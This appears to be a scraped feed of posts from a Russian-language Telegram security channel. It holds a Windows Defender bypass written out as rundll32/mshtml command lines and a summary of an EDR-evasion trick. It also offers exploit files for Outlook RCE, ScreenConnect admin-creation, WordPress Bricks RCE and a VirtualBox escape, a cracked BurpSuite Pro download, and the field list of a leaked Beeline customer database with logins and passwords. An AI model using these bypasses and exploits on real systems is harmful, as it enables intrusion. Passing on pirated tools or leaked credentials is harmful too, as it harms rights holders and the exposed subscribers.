This media is not supported in your browser
VIEW IN TELEGRAM
Xbox ? PlayStation ?
No
Ubiquiti switch !
No
Ubiquiti switch !
🔥71👍7😱5👌2
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
🔥61👍1😱1👌1
Свежая техника обхода
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
Суть вот в чем,
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
DLL EDR.Суть вот в чем,
EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
EDR в лохматой жопе.*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
🔥21
Грязный
однострочник для быстрого обнаружения
*
BASHоднострочник для быстрого обнаружения
XSS в файлах PHP*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities🔥35👍8👌1
Прощай NGINX
*
теперь и
Глав разраб форкнул проект и теперь будет
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
*
ESXI умер пару дней назадтеперь и
NGINX умерГлав разраб форкнул проект и теперь будет
FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
😱32🔥11👍2👌2
cve-2024-21413_outlook_rce.sh
1.1 KB
CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
🔥16👍3
burpsuite_pro_v2024.zip
692.2 MB
BurpSuite PRO version 2024.1.1.1
+BurpBountyPro_v2.8.0
ru+eng
+manual
+BurpBountyPro_v2.8.0
ru+eng
+manual
🔥29😱5👌3👍2
Proxy Bar
Beeline потёк
В дампе поля:
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
👍21🔥1
Proxy Bar
Beeline потёк
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
👍26
Побег из VirtualBox 7.0.10
ДЫрки в
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
ДЫрки в
virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
🔥27😱6👌3👍1
watchtowr-vs-ConnectWise_2024-02-21.py
2.6 KB
ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в
*
Usage:
*
*
Обход аутентификации для добавления нового пользователя-администратора в
ConnectWise ScreenConnect.*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!*
👍17🔥7👌2
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине
*
requirements:
*
#RCE #wordpress
*
Дыра в плагине
Bricks Builder*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich*
#RCE #wordpress
🔥21👍4👌3